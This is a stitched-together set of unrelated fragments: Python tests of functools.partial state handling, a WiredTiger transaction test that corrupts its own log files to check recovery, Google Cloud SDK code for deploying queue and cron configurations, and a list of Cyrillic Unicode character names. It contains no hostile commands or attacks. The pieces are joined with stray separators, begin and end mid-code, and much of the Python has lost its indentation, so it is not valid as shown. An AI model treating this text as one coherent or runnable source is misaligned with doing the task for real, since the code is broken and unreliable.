    f.__setstate__((f, (), {}, {}))
    try:
        assert repr(f) == '{}(...)'.format(name)
    finally:
        # Restore a sane state so the object can be collected normally.
        f.__setstate__((capture, (), {}, {}))
    # Self-reference through the positional args.
    f = partial(capture)
    f.__setstate__((capture, (f,), {}, {}))
    try:
        assert repr(f) == '{}({!r}, ...)'.format(name, capture)
    finally:
        f.__setstate__((capture, (), {}, {}))
    # Self-reference through the keyword args.
    f = partial(capture)
    f.__setstate__((capture, (), {'a': f}, {}))
    try:
        assert repr(f) == '{}({!r}, a=...)'.format(name, capture)
    finally:
        f.__setstate__((capture, (), {}, {}))
def test_pickle():
    """A partial (with extra attributes) round-trips through every protocol."""
    with AllowPickle():
        f = partial(signature, ['asdf'], bar=[True])
        f.attr = []
        for proto in range(pickle.HIGHEST_PROTOCOL + 1):
            restored = pickle.loads(pickle.dumps(f, proto))
            assert signature(restored) == signature(f)
@_hf.skip_on_pypy_not_investigated_why
def test_copy():
    """copy.copy yields a shallow copy sharing all referenced objects."""
    f = partial(signature, ['asdf'], bar=[True])
    f.attr = []
    shallow = copy.copy(f)
    assert signature(shallow) == signature(f)
    # Shallow: every component is shared, not duplicated.
    assert shallow.attr is f.attr
    assert shallow.args is f.args
    assert shallow.keywords is f.keywords
@_hf.skip_on_pypy_not_investigated_why
def test_deepcopy():
    """copy.deepcopy duplicates args/keywords and their contents."""
    f = partial(signature, ['asdf'], bar=[True])
    f.attr = []
    deep = copy.deepcopy(f)
    assert signature(deep) == signature(f)
    # Deep: nothing is shared, down to the contained mutables.
    assert deep.attr is not f.attr
    assert deep.args is not f.args
    assert deep.args[0] is not f.args[0]
    assert deep.keywords is not f.keywords
    assert deep.keywords['bar'] is not f.keywords['bar']
def test_setstate():
    # __setstate__ replaces func, args, keywords and the attribute dict.
    f = partial(signature)
    f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
    assert signature(f) == (capture, (1,), dict(a=10), dict(attr=[]))
    assert f(2, b=20) == ((1, 2), {'a': 10, 'b': 20})
    # A None attribute dict is normalized to an empty dict.
    f.__setstate__((capture, (1,), dict(a=10), None))
    assert signature(f) == (capture, (1,), dict(a=10), {})
    assert f(2, b=20) == ((1, 2), {'a': 10, 'b': 20})
    # None keywords behave like "no stored keywords".
    f.__setstate__((capture, (1,), None, None))
    # self.assertEqual(signature(f), (capture, (1,), {}, {}))
    assert f(2, b=20) == ((1, 2), {'b': 20})
    assert f(2) == ((1, 2), {})
    assert f() == ((1,), {})
    # Resetting to a fully empty state clears stored args as well.
    f.__setstate__((capture, (), {}, None))
    assert signature(f) == (capture, (), {}, {})
    assert f(2, b=20) == ((2,), {'b': 20})
    assert f(2) == ((2,), {})
    assert f() == ((), {})
def test_setstate_errors():
    """__setstate__ rejects wrong arity, wrong containers and bad members."""
    f = partial(signature)
    bad_states = [
        (capture, (), {}),              # too few items
        (capture, (), {}, {}, None),    # too many items
        [capture, (), {}, None],        # state is not a tuple
        (None, (), {}, None),           # func is not callable
        (capture, None, {}, None),      # args is None
        (capture, [], {}, None),        # args is a list, not a tuple
        (capture, (), [], None),        # keywords is not a dict
    ]
    for state in bad_states:
        with pytest.raises(TypeError):
            f.__setstate__(state)
def test_setstate_subclasses():
    """__setstate__ converts tuple/dict subclasses to plain tuple/dict."""
    f = partial(signature)
    f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
    state = signature(f)
    assert state == (capture, (1,), dict(a=10), {})
    # The subclass wrappers must have been normalized away.
    assert type(state[1]) is tuple
    assert type(state[2]) is dict
    result = f()
    assert result == ((1,), {'a': 10})
    assert type(result[0]) is tuple
    assert type(result[1]) is dict
    # Even a tuple subclass with a broken __add__ must not leak through.
    f.__setstate__((capture, BadTuple((1,)), {}, None))
    state = signature(f)
    assert state == (capture, (1,), {}, {})
    assert type(state[1]) is tuple
    result = f(2)
    assert result == ((1, 2), {})
    assert type(result[0]) is tuple
def test_setstate_refcount():
    """__setstate__ must not crash on a misbehaving sequence (issue 6083)."""
    class EvilState:
        # Pretends to be a 4-item sequence but raises on later indices.
        def __len__(self):
            return 4
        def __getitem__(self, key):
            if key == 0:
                return max
            if key == 1:
                return tuple(range(1000000))
            if key in (2, 3):
                return {}
            raise IndexError
    f = partial(object)
    with pytest.raises(TypeError):
        f.__setstate__(EvilState())
# =============================================================================
# New | |
#!/usr/bin/env python
#
# Public Domain 2014-2018 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# test_txn19.py
# Transactions: test recovery with corrupted log files
#
import fnmatch, os, shutil, time
from wtscenario import make_scenarios
from suite_subprocess import suite_subprocess
import wiredtiger, wttest
# This test uses an artificially small log file limit, and creates
# large records so two fit into a log file. This allows us to test
# both the case when corruption happens at the beginning of a log file
# (an even number of records have been created), and when corruption
# happens in the middle of a log file (with an odd number of records).
def corrupt(fname, truncate, offset, writeit):
    """Damage a log file in place.

    Seeks to `offset` (negative means end-of-file; zero/None leaves the
    position at the start), then optionally truncates the file there
    and/or writes `writeit` at that position.
    """
    with open(fname, 'r+') as log:
        if offset:
            whence = 2 if offset < 0 else 0  # 2 == os.SEEK_END
            log.seek(offset if offset > 0 else 0, whence)
        if truncate:
            log.truncate()
        if writeit:
            log.write(writeit)
class test_txn19(wttest.WiredTigerTestCase, suite_subprocess):
base_config = 'log=(archive=false,enabled,file_max=100K),' + \
'transaction_sync=(enabled,method=none)'
conn_config = base_config
corruption_type = [
('removal', dict(kind='removal', f=lambda fname:
os.remove(fname))),
('truncate', dict(kind='truncate', f=lambda fname:
corrupt(fname, True, 0, None))),
('truncate-middle', dict(kind='truncate-middle', f=lambda fname:
corrupt(fname, True, 1024 * 25, None))),
('zero-begin', dict(kind='zero', f=lambda fname:
corrupt(fname, False, 0, '\0' * 4096))),
('zero-trunc', dict(kind='zero', f=lambda fname:
corrupt(fname, True, 0, '\0' * 4096))),
('zero-end', dict(kind='zero-end', f=lambda fname:
corrupt(fname, False, -1, '\0' * 4096))),
('garbage-begin', dict(kind='garbage-begin', f=lambda fname:
corrupt(fname, False, 0, 'Bad!' * 1024))),
('garbage-middle', dict(kind='garbage-middle', f=lambda fname:
corrupt(fname, False, 1024 * 25, 'Bad!' * 1024))),
('garbage-end', dict(kind='garbage-end', f=lambda fname:
corrupt(fname, False, -1, 'Bad!' * 1024))),
]
# The list comprehension below expands each entry in the integer tuple
# list to a scenario. For example, (3, 4, 2) expands to:
# ('corrupt=[3,4],checkpoint=2', dict(corruptpos=3, corruptpos2=4, chkpt=2))
#
# Each number corresponds to a log file, so for this example, we have
# corruption in log file 3 (using the style of corruption from
# corruption_type), there is a second corruption in log file 4,
# and there is a checkpoint in log file 2. A value of 0 means no
# corruption or checkpoint.
corruption_pos = [
('corrupt=[' + str(x) + ',' + str(y) + '],checkpoint=' + str(z),
dict(corruptpos=x,corruptpos2=y,chkpt=z)) for (x,y,z) in (
(0, 0, 0), (0, 0, 2), (6, 0, 0), (6, 0, 3), (3, 0, 0),
(3, 0, 2), (3, 4, 2), (3, 5, 2), (3, 0, 4))]
nrecords = [('nrecords=10', dict(nrecords=10)),
('nrecords=11', dict(nrecords=11))]
# This function prunes out unnecessary or problematic test cases
# from the list of scenarios.
def includeFunc(name, dictarg):
kind = dictarg['kind']
corruptpos = dictarg['corruptpos']
chkpt = dictarg['chkpt']
# corruptpos == 0 indicates there is no corruption.
# (i.e. corrupt log file 0, which doesn't exist)
# We do want to test the case of no corruption, but we don't
# need to try it against every type of corruption, only one.
if corruptpos == 0:
return kind == 'removal'
# All the other cases are valid
return True
scenarios = make_scenarios(
corruption_type, corruption_pos, nrecords,
include=includeFunc, prune=20, prunelong=1000)
uri = 'table:test_txn19'
create_params = 'key_format=i,value_format=S'
# Return the log file number that contains the given record
# number. In this test, two records fit into each log file, and
# after each even record is written, a new log file is created
    # (having no records initially). The last log file is thus
    # (nrecords/2 + 1), given that we start with log 1.
def record_to_logfile(self, recordnum):
return recordnum / 2 + 1
# Returns the first record number in a log file.
def logfile_to_record(self, logfile):
return (logfile - 1) * 2
# Return true if the log file is corrupted.
# If not corrupted, the log file will produce no errors,
# and all the records originally written should be recovered.
def corrupted(self):
# Corruptpos == 0 means to do no corruption in any log file
if self.corruptpos == 0:
return False
# Adding zeroes to the end of a log file is indistinguishable
# from having a log file that is preallocated that has not been
# totally filled. One might argue that if this does not occur
# in the final log file, it could/should have been truncated.
# At any rate, we consider this particular corruption to be benign.
if self.kind == 'zero-end':
return False
return True
    def show_logs(self, homedir, msg):
        """Debug aid: print which log files exist and which are empty."""
        loglist = []
        # This test never creates more than 10 log files, so a single-digit
        # scan of WiredTigerLog.000000000N is sufficient.
        for i in range(0, 10):
            basename = 'WiredTigerLog.000000000' + str(i)
            fullname = homedir + os.sep + basename
            if os.path.isfile(fullname):
                loglist.append(i)
                if os.stat(fullname).st_size == 0:
                    self.tty('LOGS ' + msg + ': ' + str(i) + ' is empty')
        self.tty('LOGS ' + msg + ': ' + str(loglist))
    def copy_for_crash_restart(self, olddir, newdir):
        ''' Simulate a crash from olddir and restart in newdir. '''
        # with the connection still open, copy files to new directory
        shutil.rmtree(newdir, ignore_errors=True)
        os.mkdir(newdir)
        for fname in os.listdir(olddir):
            fullname = os.path.join(olddir, fname)
            # Skip lock file on Windows since it is locked.
            # Temporary (Tmplog) and preallocated (Preplog) log files are
            # also skipped so the copy looks like a crashed home directory.
            if os.path.isfile(fullname) and \
                "WiredTiger.lock" not in fullname and \
                "Tmplog" not in fullname and \
                "Preplog" not in fullname:
                shutil.copy(fullname, newdir)
# Generate a value that is a bit over half the size of the log file.
def valuegen(self, i):
return str(i) + 'A' * (1024 * 60) # ~60K
# Insert a list of keys
    def inserts(self, keylist):
        """Insert one large value per key, checkpointing when configured.

        A checkpoint is taken just before inserting the first record that
        lands in log file self.chkpt; chkpt == 0 means never checkpoint.
        """
        c = self.session.open_cursor(self.uri)
        for i in keylist:
            # Checkpoint right before writing the first record of the
            # configured checkpoint log file.
            if self.chkpt > 0 and self.logfile_to_record(self.chkpt) == i:
                self.session.checkpoint()
            c[i] = self.valuegen(i)
        c.close()
    def checks(self, expectlist):
        """Verify the table holds exactly the keys in expectlist, in order."""
        c = self.session.open_cursor(self.uri, None, None)
        gotlist = []
        for key, value in c:
            gotlist.append(key)
            # Every surviving record must carry its original generated value.
            self.assertEqual(self.valuegen(key), value)
        self.assertEqual(expectlist, gotlist)
        c.close()
def log_number_to_file_name(self, homedir, n):
self.assertLess(n, 10) # assuming 1 digit
return homedir + os.sep + 'WiredTigerLog.000000000' + str(n)
def corrupt_log(self, homedir):
if not self.corrupted():
return
self.f(self.log_number_to_file_name(homedir, self.corruptpos))
# Corrupt a second log file if needed
if self.corruptpos2 != 0:
self.f(self.log_number_to_file_name(homedir, self.corruptpos2))
def corrupt_last_file(self):
return self.corruptpos == self.record_to_logfile(self.nrecords)
# Corruption past the last written record in a log file can sometimes
# be detected. In our test case, the last log file has zero or one large
# 60K record written into it, but it is presized to 100K. Corruption
# at the end of this file creates a hole, and the corruption starts
# a new log record, where it can be detected as phony. Similarly,
# corruption in the "middle" of the last file (actually the 25K point)
# can be detected if there aren't any of the insert records in the file.
def corrupt_hole_in_last_file(self):
return self.corrupt_last_file() and \
((self.kind == 'garbage-middle' and self.nrecords % 2 == 0) or \
self.kind == 'garbage-end')
# Return true iff the log has been damaged in a way that is not detected
# as a corruption. WiredTiger must be lenient about damage in any log
# file, because a partial log record written just before a crash is in
# most cases indistinguishable | |
in the
format: 'projects/<project>/locations/<location>/queues/<queue>'
"""
  def __init__(self, relative_path):
    """Stores the queue's full relative path.

    Args:
      relative_path: A string in the format
        'projects/<project>/locations/<location>/queues/<queue>'.
    """
    self._relative_path = relative_path
  def RelativeName(self):
    """Gets the string representing the full path for a queue.

    This is the only function we are currently using in CT APIs for the
    queue_ref resource object.

    Returns:
      A string representing the full path for a queue in the following
      format: 'projects/<project>/locations/<location>/queues/<queue>'
    """
    return self._relative_path
queue_yaml = config.parsed
resume_paused_queues = queue_yaml.resume_paused_queues != 'False'
queues_client = tasks_api.queues
queues_not_present_in_yaml = set(all_queues_in_db_dict.keys())
# Just need to create one real instance of queue_ref. After that we can
# create placeholder queue_ref objects based on this instance.
queue_ref = parsers.ParseQueue('a')
queue_ref_stub = queue_ref.RelativeName()[:-1]
# Get the arg values that we need to fill up for each queue using CT APIs
# pylint: disable=protected-access
task_args = flags._PushQueueFlags(release_track=ct_api_version)
# TODO(b/169069379) Remove max_burst_size when/if API is exposed via `gcloud
# tasks queues` CLI invocation.
task_args.append(base.Argument('--max_burst_size', type=int, help=''))
expected_args = []
for task_flag in task_args:
new_arg = task_flag.args[0][2:].replace('-', '_')
expected_args.extend((new_arg, 'clear_{}'.format(new_arg)))
responses = []
if queue_yaml.queue is None:
queue_yaml.queue = []
for queue in queue_yaml.queue:
if queue.name in queues_not_present_in_yaml:
queues_not_present_in_yaml.remove(queue.name)
queue_ref = _PlaceholderQueueRef('{}{}'.format(queue_ref_stub, queue.name))
cur_queue_object = all_queues_in_db_dict.get(queue.name, None)
cloud_task_args = _PopulateCloudTasksArgs(queue, cur_queue_object,
expected_args)
rate_to_set = cloud_task_args.GetValue('max_dispatches_per_second')
if (
resume_paused_queues and
cur_queue_object and
(rate_to_set or queue.mode == constants.PULL_QUEUE) and
cur_queue_object.state in (cur_queue_object.state.DISABLED,
cur_queue_object.state.PAUSED)
):
# Resume queue if it exists, was previously disabled/paused, the new
# rate > 0 and if there is no global flag to skip resuming paused queues.
queues_client.Resume(queue_ref)
elif (
cur_queue_object and
not rate_to_set and
cur_queue_object.state == cur_queue_object.state.RUNNING and
queue.mode in (None, constants.PUSH_QUEUE)
):
queues_client.Pause(queue_ref)
if not _AnyUpdatableFields(cloud_task_args):
# Queue attributes in DB == Queue attributes in YAML
continue
queue_config = parsers.ParseCreateOrUpdateQueueArgs(
cloud_task_args,
# Deliberately hardcoding push queues because we want to be able to
# modify all attributes even for pull queues.
constants.PUSH_QUEUE,
tasks_api.messages,
release_track=ct_api_version)
updated_fields = parsers.GetSpecifiedFieldsMask(
cloud_task_args, constants.PUSH_QUEUE, release_track=ct_api_version)
# TaskTTL and TombstoneTTL are both immutable so we only set them upon
# queue creation. The values set here are as close as possible to the
# default values used with legacy app deploy which used superapps.
if not cur_queue_object:
updated_fields.extend(['taskTtl', 'tombstoneTtl'])
app_engine_routing_override = (
queue_config.appEngineHttpQueue.appEngineRoutingOverride
if queue_config.appEngineHttpQueue is not None else None)
response = queues_client.Patch(
queue_ref,
updated_fields,
retry_config=queue_config.retryConfig,
rate_limits=queue_config.rateLimits,
app_engine_routing_override=app_engine_routing_override,
task_ttl=constants.MAX_TASK_TTL if not cur_queue_object else None,
task_tombstone_ttl=(
constants.MAX_TASK_TOMBSTONE_TTL if not cur_queue_object else None),
queue_type=queue_config.type
)
responses.append(response)
if (
not cur_queue_object and
not rate_to_set and
queue.mode == constants.PUSH_QUEUE
):
# Pause queue if its a new push-queue and rate is zero.
queues_client.Pause(queue_ref)
for queue_name in queues_not_present_in_yaml:
  # Skipping 'default' queue to retain backwards compatibility with legacy
# behaviour where admin-console-hr would not DISABLE queues named 'default'.
if queue_name == 'default':
continue
queue = all_queues_in_db_dict[queue_name]
if queue.state in (queue.state.PAUSED, queue.state.DISABLED):
continue
queue_ref = _PlaceholderQueueRef('{}{}'.format(queue_ref_stub, queue_name))
queues_client.Pause(queue_ref)
return responses
def _CreateUniqueJobKeyForExistingJob(job, project):
  """Creates a key from the proto job instance's attributes passed as input.

  The field order mirrors _CreateUniqueJobKeyForYamlJob so that a backend
  job and a YAML job with identical attributes produce equal keys.

  Args:
    job: An instance of job fetched from the backend.
    project: The base name of the project.

  Returns:
    A tuple of attributes used as a key to identify this job.
  """
  # retryConfig may be unset, so every retry-derived field is guarded.
  # String-encoded durations are normalized to floats so they compare
  # equal to the numeric values derived from YAML jobs.
  return (
      job.schedule,
      job.timeZone,
      job.appEngineHttpTarget.relativeUri,
      job.description,
      convertors.CheckAndConvertStringToFloatIfApplicable(
          job.retryConfig.minBackoffDuration) if job.retryConfig else None,
      convertors.CheckAndConvertStringToFloatIfApplicable(
          job.retryConfig.maxBackoffDuration) if job.retryConfig else None,
      job.retryConfig.maxDoublings if job.retryConfig else None,
      convertors.CheckAndConvertStringToFloatIfApplicable(
          job.retryConfig.maxRetryDuration) if job.retryConfig else None,
      job.retryConfig.retryCount if job.retryConfig else None,
      parsers.ExtractTargetFromAppEngineHostUrl(job, project),
  )
def _ReplaceDefaultRetryParamsForYamlJob(job):
  """Replaces default values for retry parameters.

  Retry parameters are set to their default values if not already user defined.
  These values are only set if the user has defined at least one retry
  parameter. Also we are limiting min_backoff to a minimum value of 5.0s since
  the new scheduler API does not support setting a lower value than this.

  Modifies input `job` argument directly.

  Args:
    job: An instance of a parsed YAML job object.
  """
  defaults = constants.CRON_JOB_LEGACY_DEFAULT_VALUES
  retry_data = job.retry_parameters
  if retry_data:
    # Min max backoff is a special case. If only one is specified, the other
    # value is set to its default value as long as this condition is satisfied:
    # 'min_backoff <= max_backoff'. Otherwise, the unspecified value is set
    # equal to the specified value.
    if (
        retry_data.min_backoff_seconds is None and
        retry_data.max_backoff_seconds is None
    ):
      # Both values are None so we should set them to defaults.
      retry_data.min_backoff_seconds = defaults['min_backoff']
      retry_data.max_backoff_seconds = defaults['max_backoff']
    elif (
        retry_data.min_backoff_seconds is None or
        retry_data.max_backoff_seconds is None
    ):
      # Only one of the backoff values is None. We need to ensure that
      # min_backoff <= max_backoff.
      # NOTE(review): a falsy min_backoff (0) is also replaced by the default
      # here, not just None — confirm treating 0 as "unset" is intended.
      if not retry_data.min_backoff_seconds:
        retry_data.min_backoff_seconds = defaults['min_backoff']
      if retry_data.max_backoff_seconds:
        # max was given: clamp min down so min_backoff <= max_backoff.
        retry_data.min_backoff_seconds = min(retry_data.min_backoff_seconds,
                                             retry_data.max_backoff_seconds)
      if retry_data.max_backoff_seconds is None:
        retry_data.max_backoff_seconds = defaults['max_backoff']
      # Final normalization: raise max so min_backoff <= max_backoff holds.
      retry_data.max_backoff_seconds = max(retry_data.min_backoff_seconds,
                                           retry_data.max_backoff_seconds)
    # Max Doublings
    if retry_data.max_doublings is None:
      retry_data.max_doublings = defaults['max_doublings']
    # Job Age Limit
    if retry_data.job_age_limit is None:
      retry_data.job_age_limit = defaults['max_retry_duration']
def _CreateUniqueJobKeyForYamlJob(job):
  """Creates a key from the YAML job instance's attributes passed as input.

  The field order mirrors _CreateUniqueJobKeyForExistingJob so that a YAML
  job and a backend job with identical attributes produce equal keys.

  Args:
    job: An instance of a parsed YAML job object.

  Returns:
    A tuple of attributes used as a key to identify this job.
  """
  retry_params = job.retry_parameters
  return (
      job.schedule,
      # An unset timezone defaults to 'UTC', matching how CreateJobInstance
      # stores jobs in the backend.
      job.timezone if job.timezone else 'UTC',
      job.url,
      job.description,
      retry_params.min_backoff_seconds if retry_params else None,
      retry_params.max_backoff_seconds if retry_params else None,
      retry_params.max_doublings if retry_params else None,
      # The age limit may be string-encoded; normalize to float to match
      # the converted backend value.
      convertors.CheckAndConvertStringToFloatIfApplicable(
          retry_params.job_age_limit) if retry_params else None,
      retry_params.job_retry_limit if retry_params else None,
      job.target,
  )
def _BuildJobsMappingDict(existing_jobs, project):
  """Groups existing backend jobs by their attribute-derived key.

  Jobs whose attributes (schedule, url, timezone, description, retry
  settings, target, etc.) all match share a single key and are collected
  into the same bucket.

  Args:
    existing_jobs: A list of jobs that already exist in the backend. Each job
      maps to an apis.cloudscheduler.<ver>.cloudscheduler<ver>_messages.Job
      instance.
    project: The base name of the project.

  Returns:
    A dictionary mapping an attribute key tuple to the list of Job
    instances that share those attributes.
  """
  grouped = {}
  for existing_job in existing_jobs:
    key = _CreateUniqueJobKeyForExistingJob(existing_job, project)
    grouped.setdefault(key, []).append(existing_job)
  return grouped
def CreateJobInstance(scheduler_api, yaml_job):
  """Build a proto format job instance matching the input YAML based job.

  Args:
    scheduler_api: api_lib.scheduler.<Alpha|Beta|GA>ApiAdapter, Cloud Scheduler
      API needed for doing jobs based operations.
    yaml_job: A parsed yaml_job entry read from the 'cron.yaml' file.

  Returns:
    An cloudscheduler.<ver>.cloudscheduler_<ver>_messages.Job instance.
  """
  messages = scheduler_api.messages
  # Only build a retry config when the YAML entry defines retry parameters;
  # otherwise leave it unset on the proto.
  if yaml_job.retry_parameters:
    retry_config = messages.RetryConfig(
        maxBackoffDuration=convertors.ConvertBackoffSeconds(
            yaml_job.retry_parameters.max_backoff_seconds),
        maxDoublings=yaml_job.retry_parameters.max_doublings,
        maxRetryDuration=convertors.ConvertTaskAgeLimit(
            yaml_job.retry_parameters.job_age_limit),
        minBackoffDuration=convertors.ConvertBackoffSeconds(
            yaml_job.retry_parameters.min_backoff_seconds),
        retryCount=yaml_job.retry_parameters.job_retry_limit
    )
  else:
    retry_config = None
  return messages.Job(
      appEngineHttpTarget=messages.AppEngineHttpTarget(
          # Cron jobs are always dispatched as HTTP GET to the job's URL.
          httpMethod=messages.AppEngineHttpTarget.HttpMethodValueValuesEnum.GET,
          relativeUri=yaml_job.url,
          appEngineRouting=messages.AppEngineRouting(service=yaml_job.target)),
      retryConfig=retry_config,
      description=yaml_job.description,
      # Propagate the client's legacy-cron flag onto the created job.
      legacyAppEngineCron=scheduler_api.jobs.legacy_cron,
      schedule=yaml_job.schedule,
      # An unset timezone defaults to 'UTC' (mirrored by the job key
      # builders above).
      timeZone=yaml_job.timezone if yaml_job.timezone else 'UTC')
def DeployCronYamlFile(scheduler_api, config, existing_jobs):
"""Perform a deployment based on the parsed 'cron.yaml' file.
For every job defined in the cron.yaml file, we will create a new cron job
for any job that did not already exist in our backend. We will also delete
those jobs which are not present in the YAML file but exist in our backend.
Note: We do not update any jobs. The only operations are Create and Delete.
So if we modify any attribute of an existing job in the YAML file, the old
job gets deleted and a new job is created based on the new attributes.
Args:
scheduler_api: api_lib.scheduler.<Alpha|Beta|GA>ApiAdapter, Cloud Scheduler
API needed for doing jobs based operations.
config: A yaml_parsing.ConfigYamlInfo object for the parsed YAML file we
are going to process.
existing_jobs: A list of jobs that already exist in the backend. Each job
maps to an apis.cloudscheduler.<ver>.cloudscheduler<ver>_messages.Job
instance.
Returns:
A list of responses received from the Cloud Scheduler APIs representing job
states for every call made to create a job.
"""
cron_yaml = config.parsed
jobs_client = scheduler_api.jobs
app_location = app.ResolveAppLocation(
parsers.ParseProject(), locations_client=scheduler_api.locations)
region_ref = parsers.ParseLocation(app_location).RelativeName()
project = os.path.basename(str(parsers.ParseProject()))
existing_jobs_dict = _BuildJobsMappingDict(existing_jobs, project)
# Create a new job for any job that does not map exactly to jobs that already
# exist in the backend.
responses = []
if cron_yaml.cron:
for yaml_job in cron_yaml.cron:
_ReplaceDefaultRetryParamsForYamlJob(yaml_job)
job_key = _CreateUniqueJobKeyForYamlJob(yaml_job)
if job_key in existing_jobs_dict and existing_jobs_dict[job_key]:
# If the job already exists then we do not need to do | |
LETTER EF
0425 CYRILLIC CAPITAL LETTER HA
0426 CYRILLIC CAPITAL LETTER TSE
0427 CYRILLIC CAPITAL LETTER CHE
0428 CYRILLIC CAPITAL LETTER SHA
0429 CYRILLIC CAPITAL LETTER SHCHA
042A CYRILLIC CAPITAL LETTER HARD SIGN
042B CYRILLIC CAPITAL LETTER YERU
042C CYRILLIC CAPITAL LETTER SOFT SIGN
042D CYRILLIC CAPITAL LETTER E
042E CYRILLIC CAPITAL LETTER YU
042F CYRILLIC CAPITAL LETTER YA
0430 CYRILLIC SMALL LETTER A
0431 CYRILLIC SMALL LETTER BE
0432 CYRILLIC SMALL LETTER VE
0433 CYRILLIC SMALL LETTER GHE
0434 CYRILLIC SMALL LETTER DE
0435 CYRILLIC SMALL LETTER IE
0436 CYRILLIC SMALL LETTER ZHE
0437 CYRILLIC SMALL LETTER ZE
0438 CYRILLIC SMALL LETTER I
0439 CYRILLIC SMALL LETTER SHORT I
043A CYRILLIC SMALL LETTER KA
043B CYRILLIC SMALL LETTER EL
043C CYRILLIC SMALL LETTER EM
043D CYRILLIC SMALL LETTER EN
043E CYRILLIC SMALL LETTER O
043F CYRILLIC SMALL LETTER PE
0440 CYRILLIC SMALL LETTER ER
0441 CYRILLIC SMALL LETTER ES
0442 CYRILLIC SMALL LETTER TE
0443 CYRILLIC SMALL LETTER U
0444 CYRILLIC SMALL LETTER EF
0445 CYRILLIC SMALL LETTER HA
0446 CYRILLIC SMALL LETTER TSE
0447 CYRILLIC SMALL LETTER CHE
0448 CYRILLIC SMALL LETTER SHA
0449 CYRILLIC SMALL LETTER SHCHA
044A CYRILLIC SMALL LETTER HARD SIGN
044B CYRILLIC SMALL LETTER YERU
044C CYRILLIC SMALL LETTER SOFT SIGN
044D CYRILLIC SMALL LETTER E
044E CYRILLIC SMALL LETTER YU
044F CYRILLIC SMALL LETTER YA
0450 CYRILLIC SMALL LETTER IE WITH GRAVE
0451 CYRILLIC SMALL LETTER IO
0452 CYRILLIC SMALL LETTER DJE
0453 CYRILLIC SMALL LETTER GJE
0454 CYRILLIC SMALL LETTER UKRAINIAN IE
0455 CYRILLIC SMALL LETTER DZE
0456 CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
0457 CYRILLIC SMALL LETTER YI
0458 CYRILLIC SMALL LETTER JE
0459 CYRILLIC SMALL LETTER LJE
045A CYRILLIC SMALL LETTER NJE
045B CYRILLIC SMALL LETTER TSHE
045C CYRILLIC SMALL LETTER KJE
045D CYRILLIC SMALL LETTER I WITH GRAVE
045E CYRILLIC SMALL LETTER SHORT U
045F CYRILLIC SMALL LETTER DZHE
0460 CYRILLIC CAPITAL LETTER OMEGA
0461 CYRILLIC SMALL LETTER OMEGA
0462 CYRILLIC CAPITAL LETTER YAT
0463 CYRILLIC SMALL LETTER YAT
0464 CYRILLIC CAPITAL LETTER IOTIFIED E
0465 CYRILLIC SMALL LETTER IOTIFIED E
0466 CYRILLIC CAPITAL LETTER LITTLE YUS
0467 CYRILLIC SMALL LETTER LITTLE YUS
0468 CYRILLIC CAPITAL LETTER IOTIFIED LITTLE YUS
0469 CYRILLIC SMALL LETTER IOTIFIED LITTLE YUS
046A CYRILLIC CAPITAL LETTER BIG YUS
046B CYRILLIC SMALL LETTER BIG YUS
046C CYRILLIC CAPITAL LETTER IOTIFIED BIG YUS
046D CYRILLIC SMALL LETTER IOTIFIED BIG YUS
046E CYRILLIC CAPITAL LETTER KSI
046F CYRILLIC SMALL LETTER KSI
0470 CYRILLIC CAPITAL LETTER PSI
0471 CYRILLIC SMALL LETTER PSI
0472 CYRILLIC CAPITAL LETTER FITA
0473 CYRILLIC SMALL LETTER FITA
0474 CYRILLIC CAPITAL LETTER IZHITSA
0475 CYRILLIC SMALL LETTER IZHITSA
0476 CYRILLIC CAPITAL LETTER IZHITSA WITH DOUBLE GRAVE ACCENT
0477 CYRILLIC SMALL LETTER IZHITSA WITH DOUBLE GRAVE ACCENT
0478 CYRILLIC CAPITAL LETTER UK
0479 CYRILLIC SMALL LETTER UK
047A CYRILLIC CAPITAL LETTER ROUND OMEGA
047B CYRILLIC SMALL LETTER ROUND OMEGA
047C CYRILLIC CAPITAL LETTER OMEGA WITH TITLO
047D CYRILLIC SMALL LETTER OMEGA WITH TITLO
047E CYRILLIC CAPITAL LETTER OT
047F CYRILLIC SMALL LETTER OT
0480 CYRILLIC CAPITAL LETTER KOPPA
0481 CYRILLIC SMALL LETTER KOPPA
0482 CYRILLIC THOUSANDS SIGN
0483 COMBINING CYRILLIC TITLO
0484 COMBINING CYRILLIC PALATALIZATION
0485 COMBINING CYRILLIC DASIA PNEUMATA
0486 COMBINING CYRILLIC PSILI PNEUMATA
0487 COMBINING CYRILLIC POKRYTIE
0488 COMBINING CYRILLIC HUNDRED THOUSANDS SIGN
0489 COMBINING CYRILLIC MILLIONS SIGN
048A CYRILLIC CAPITAL LETTER SHORT I WITH TAIL
048B CYRILLIC SMALL LETTER SHORT I WITH TAIL
048C CYRILLIC CAPITAL LETTER SEMISOFT SIGN
048D CYRILLIC SMALL LETTER SEMISOFT SIGN
048E CYRILLIC CAPITAL LETTER ER WITH TICK
048F CYRILLIC SMALL LETTER ER WITH TICK
0490 CYRILLIC CAPITAL LETTER GHE WITH UPTURN
0491 CYRILLIC SMALL LETTER GHE WITH UPTURN
0492 CYRILLIC CAPITAL LETTER GHE WITH STROKE
0493 CYRILLIC SMALL LETTER GHE WITH STROKE
0494 CYRILLIC CAPITAL LETTER GHE WITH MIDDLE HOOK
0495 CYRILLIC SMALL LETTER GHE WITH MIDDLE HOOK
0496 CYRILLIC CAPITAL LETTER ZHE WITH DESCENDER
